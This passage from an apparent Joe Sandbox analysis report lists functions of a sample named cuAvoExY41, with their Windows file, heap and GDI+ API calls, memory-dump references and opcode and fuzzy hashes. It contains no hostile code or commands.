                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: c70cda09d434460db0332ba5177ffc091cb3ad66ef9ee763d87ef80b5d892589
                                                          • Instruction ID: c91cfec3c5ddc1a0812393749a2e60729aefeaa9a2a74f42bc6dd9c56409fcc7
                                                          • Opcode Fuzzy Hash: c70cda09d434460db0332ba5177ffc091cb3ad66ef9ee763d87ef80b5d892589
                                                          • Instruction Fuzzy Hash: 8221C171508344AFE3308A66CC89FF777DCEB49334F100A19FA95C65D1C7B8A884AA71
                                                          Function 00FB9E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00FB9EC7
                                                          • GetLastError.KERNEL32 ref: 00FB9ED4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastPointer
                                                          • String ID:
                                                          • API String ID: 2976181284-0
                                                          • Opcode ID: e81ab69e193ca63e961cc0647d7e60c16749c6f8fc2500b4a50bae9249831b86
                                                          • Instruction ID: d3905018fcd42974db1b7cb56cdb62aeb5a60b0ef8192ae68034450309e9fa52
                                                          • Opcode Fuzzy Hash: e81ab69e193ca63e961cc0647d7e60c16749c6f8fc2500b4a50bae9249831b86
                                                          • Instruction Fuzzy Hash: 9111C631A04604ABD724CA26CC84BF6B7E9AB44370F504A29E652D26E0D7F4ED45EE70
                                                          Function 00FD8E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 00FD8E75
                                                            • Part of subcall function 00FD8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00FDCA2C,00000000,?,00FD6CBE,?,00000008,?,00FD91E0,?,?,?), ref: 00FD8E38
                                                          • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00FF1098,00FB17CE,?,?,00000007,?,?,?,00FB13D6,?,00000000), ref: 00FD8EB1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocAllocate_free
                                                          • String ID:
                                                          • API String ID: 2447670028-0
                                                          • Opcode ID: a5849816744636e1e6c85898005cab17238ec05c44044c5a2d5ac76100e6e521
                                                          • Instruction ID: 2f1132eb68219f095ada6ce58e3abf555f84f2c14f79c15e14b879de85ab4c3d
                                                          • Opcode Fuzzy Hash: a5849816744636e1e6c85898005cab17238ec05c44044c5a2d5ac76100e6e521
                                                          • Instruction Fuzzy Hash: BBF0A432A01115668B217BA59C05B6F376B8BC1BF0F2C0117F8145A391DE648D03B9A0
                                                          Function 00FC109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(?,?), ref: 00FC10AB
                                                          • GetProcessAffinityMask.KERNEL32(00000000), ref: 00FC10B2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: Process$AffinityCurrentMask
                                                          • String ID:
                                                          • API String ID: 1231390398-0
                                                          • Opcode ID: 2cf2244001a351532e4dcb2bfb59b8b847761ac8e8c72f327e57f04e8d593496
                                                          • Instruction ID: 88205dd795e5dd9671bcccb58c1b58cf9161de0af511538bb9eecec78ee45f0f
                                                          • Opcode Fuzzy Hash: 2cf2244001a351532e4dcb2bfb59b8b847761ac8e8c72f327e57f04e8d593496
                                                          • Instruction Fuzzy Hash: 4AE09232F4018AA78F198BA49D1AEAB73DDFA4525831041B9E503D7202F930DE416A61
                                                          Function 00FBA4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00FBA325,?,?,?,00FBA175,?,00000001,00000000,?,?), ref: 00FBA501
                                                            • Part of subcall function 00FBBB03: _wcslen.LIBCMT ref: 00FBBB27
                                                          • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00FBA325,?,?,?,00FBA175,?,00000001,00000000,?,?), ref: 00FBA532
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile$_wcslen
                                                          • String ID:
                                                          • API String ID: 2673547680-0
                                                          • Opcode ID: 7fcc5143cda1849a9e7a613748b32cf677cf44cccb8f9bb9b536a9aa744de2b3
                                                          • Instruction ID: 2b0987d1386106449e6f6542c9dcc868701a09492bad156cfd3649c80055b4ec
                                                          • Opcode Fuzzy Hash: 7fcc5143cda1849a9e7a613748b32cf677cf44cccb8f9bb9b536a9aa744de2b3
                                                          • Instruction Fuzzy Hash: 7AF030326501497BDF119F61DC49FEA37ACAB04385F488051B945D6160DB71DA94FE50
                                                          Function 00FBA1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DeleteFileW.KERNELBASE(000000FF,?,?,00FB977F,?,?,00FB95CF,?,?,?,?,?,00FE2641,000000FF), ref: 00FBA1F1
                                                            • Part of subcall function 00FBBB03: _wcslen.LIBCMT ref: 00FBBB27
                                                          • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00FB977F,?,?,00FB95CF,?,?,?,?,?,00FE2641), ref: 00FBA21F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: DeleteFile$_wcslen
                                                          • String ID:
                                                          • API String ID: 2643169976-0
                                                          • Opcode ID: ddd88929669cfc2b1a7c46a0a6f326ba0197af5dac313400e4cf9d190ce10e1c
                                                          • Instruction ID: 2bf430f4ed5bc8880c096aaf341cebfb54b6fee6bd6b9db6b7bcf5ca20407322
                                                          • Opcode Fuzzy Hash: ddd88929669cfc2b1a7c46a0a6f326ba0197af5dac313400e4cf9d190ce10e1c
                                                          • Instruction Fuzzy Hash: C9E0D8315402096BEB01AF61DC49FE9375CAF0C3C5F484021B945D6055EB71DEC4FE50
                                                          Function 00FCAC7C Relevance: 3.0, APIs: 2, Instructions: 26comCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GdiplusShutdown.GDIPLUS(?,?,?,?,00FE2641,000000FF), ref: 00FCACB0
                                                          • OleUninitialize.OLE32(?,?,?,?,00FE2641,000000FF), ref: 00FCACB5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: GdiplusShutdownUninitialize
                                                          • String ID:
                                                          • API String ID: 3856339756-0
                                                          • Opcode ID: c889bb6e0816379ff5eb76915ba1119b891ba44e2a53806cfa9db93beb8809d6
                                                          • Instruction ID: 09635f3d58ec0730790293a39abdc7e6c0a0ab05b8043f204afbc1a7c8e9c49b
                                                          • Opcode Fuzzy Hash: c889bb6e0816379ff5eb76915ba1119b891ba44e2a53806cfa9db93beb8809d6
                                                          • Instruction Fuzzy Hash: 05E06D72604A54EFCB10DB59DC46B59FBBCFB88B20F04436AF416D37A0CB78A801DA90
                                                          Function 00FBA243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(?,?,?,00FBA23A,?,00FB755C,?,?,?,?), ref: 00FBA254
                                                            • Part of subcall function 00FBBB03: _wcslen.LIBCMT ref: 00FBBB27
                                                          • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00FBA23A,?,00FB755C,?,?,?,?), ref: 00FBA280
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile$_wcslen
                                                          • String ID:
                                                          • API String ID: 2673547680-0
                                                          • Opcode ID: 595672d60c0183534fea2075c658927e81d6382069fbb164323db25a98d7aff9
                                                          • Instruction ID: 7f0f4bec61a67cf8378ad1eee4fb52933a7463f93ad6bf0d33d2d088636704d6
                                                          • Opcode Fuzzy Hash: 595672d60c0183534fea2075c658927e81d6382069fbb164323db25a98d7aff9
                                                          • Instruction Fuzzy Hash: 4AE092329001286BCB60AB64CC09BD97758AB083E5F0442A1FE45E71D0D770DE44EAA0
                                                          Function 00FCDEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _swprintf.LIBCMT ref: 00FCDEEC
                                                            • Part of subcall function 00FB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FB40A5
                                                          • SetDlgItemTextW.USER32(00000065,?), ref: 00FCDF03
                                                            • Part of subcall function 00FCB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00FCB579
                                                            • Part of subcall function 00FCB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FCB58A
                                                            • Part of subcall function 00FCB568: IsDialogMessageW.USER32(00010444,?), ref: 00FCB59E
                                                            • Part of subcall function 00FCB568: TranslateMessage.USER32(?), ref: 00FCB5AC
                                                            • Part of subcall function 00FCB568: DispatchMessageW.USER32(?), ref: 00FCB5B6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                          • String ID:
                                                          • API String ID: 2718869927-0
                                                          • Opcode ID: 4d9e5b7369695f66bfd9eb8d075b8586a4f872cf3feaecf7996d3952b3667946
                                                          • Instruction ID: b9c05399ba702ccca60f2b8eb9d58ee2655ccbdac896405fb5f54c97f17d091d
                                                          • Opcode Fuzzy Hash: 4d9e5b7369695f66bfd9eb8d075b8586a4f872cf3feaecf7996d3952b3667946
                                                          • Instruction Fuzzy Hash: 54E092B650024926DF02EB65DD07FEE3BAC5B057C5F040855B241DA0A3DA7DEA11EB61
                                                          Function 00FC081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00FC0836
                                                          • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00FBF2D8,Crypt32.dll,00000000,00FBF35C,?,?,00FBF33E,?,?,?), ref: 00FC0858
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: DirectoryLibraryLoadSystem
                                                          • String ID:
                                                          • API String ID: 1175261203-0
                                                          • Opcode ID: d94f6e5c4daf1ed1dff676d88282733086e18dbdb9d2083221f0042be870f6db
                                                          • Instruction ID: 8798a8cf1d83373651c34be0d98ea76796e02994e828f13dfcbbab6b13573979
                                                          • Opcode Fuzzy Hash: d94f6e5c4daf1ed1dff676d88282733086e18dbdb9d2083221f0042be870f6db
                                                          • Instruction Fuzzy Hash: 40E0487680015C6BDB11A795DD4DFDA77ACEF0D3D1F0400657645D3044DA78DA84DBB0
                                                          Function 00FCA3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00FCA3DA
                                                          • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00FCA3E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: BitmapCreateFromGdipStream
                                                          • String ID:
                                                          • API String ID: 1918208029-0
                                                          • Opcode ID: c9c293a5d3034414a942832b2d167b6a4249fe4879f43e9a0f643cf135314f18
                                                          • Instruction ID: 83efc92b1a2d5d5f4f3722ad3a8eef7e66a3ff9f540a5dd250298038aa669c7a
                                                          • Opcode Fuzzy Hash: c9c293a5d3034414a942832b2d167b6a4249fe4879f43e9a0f643cf135314f18
                                                          • Instruction Fuzzy Hash: 26E0ED72900219EBCB10DF55CA42BA9BBE8EB04364F10805EA84693201E374BE04EB91
                                                          Function 00FD2B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00FD2BAA
                                                          • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00FD2BB5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                          • String ID:
                                                          • API String ID: 1660781231-0
                                                          • Opcode ID: 63126868f4a2d5642a24ca76696b14cda0ac3938e90c36ffaeb48fdf122396a6
                                                          • Instruction ID: 65e6b4c52e75a5a1abb263d6ab01d5295efcc8962aecbeda8ae831001e368086
                                                          • Opcode Fuzzy Hash: 63126868f4a2d5642a24ca76696b14cda0ac3938e90c36ffaeb48fdf122396a6
                                                          • Instruction Fuzzy Hash: 38D0A935A68204184D946A702C025583387AEF2B707BC178BF0208A7C2EED88040B0A2
                                                          Function 00FB12F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: ItemShowWindow
                                                          • String ID:
                                                          • API String ID: 3351165006-0
                                                          • Opcode ID: d3601f797b8cf2c3cc3f6fb357c663e466d3985990fd6bad338436d3447e9893
                                                          • Instruction ID: 6a7c44cb556bb76724dbfd9303e6790f853673d2b54ef490bc5bdc9724778941
                                                          • Opcode Fuzzy Hash: d3601f797b8cf2c3cc3f6fb357c663e466d3985990fd6bad338436d3447e9893
                                                          • Instruction Fuzzy Hash: B5C012B245C200BECB010BB4DC0AC2BBBB8BBA5322F04C908B0E5C0054C23EC010DB11
                                                          Function 00FB1A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID:
                                                          • API String ID: 3519838083-0
                                                          • Opcode ID: 9123b9ed4ae9bc4db2ad5e18097dda46491c9f8727d2336840863a6959cf7505
                                                          • Instruction ID: 514df1c6f5f83e43c4c087d8457ae2489b00efb44a41c398dcbb1bfd062b0975
                                                          • Opcode Fuzzy Hash: 9123b9ed4ae9bc4db2ad5e18097dda46491c9f8727d2336840863a6959cf7505
                                                          • Instruction Fuzzy Hash: BEC1C070E002549BEF14CF29C8A8BF97BA5BF49320F5841B9EC459F286DB349944EF61
                                                          Function 00FB3BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID:
                                                          • API String ID: 3519838083-0
                                                          • Opcode ID: d38504932629dc742d23c1a6115d6d2f681320ea5b86219d0a65ea5a1135cc13
                                                          • Instruction ID: 02da6e56702becb58c75b6cbb3722882f4a9bf8da9438f4e66946f26d512f37d
                                                          • Opcode Fuzzy Hash: d38504932629dc742d23c1a6115d6d2f681320ea5b86219d0a65ea5a1135cc13
                                                          • Instruction Fuzzy Hash: 0E710671540B459ECB35DB71CC51AE7B7E9AF14300F40092EF1AB83242EA367648EF11
                                                          Function 00FB8284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00FB8289
                                                            • Part of subcall function 00FB13DC: __EH_prolog.LIBCMT ref: 00FB13E1
                                                            • Part of subcall function 00FBA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00FBA598
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: H_prolog$CloseFind
                                                          • String ID:
                                                          • API String ID: 2506663941-0
                                                          • Opcode ID: a2b76208f34996ffecbc22f86eab349677401000b3a7c1ed20d195610a2c6af0
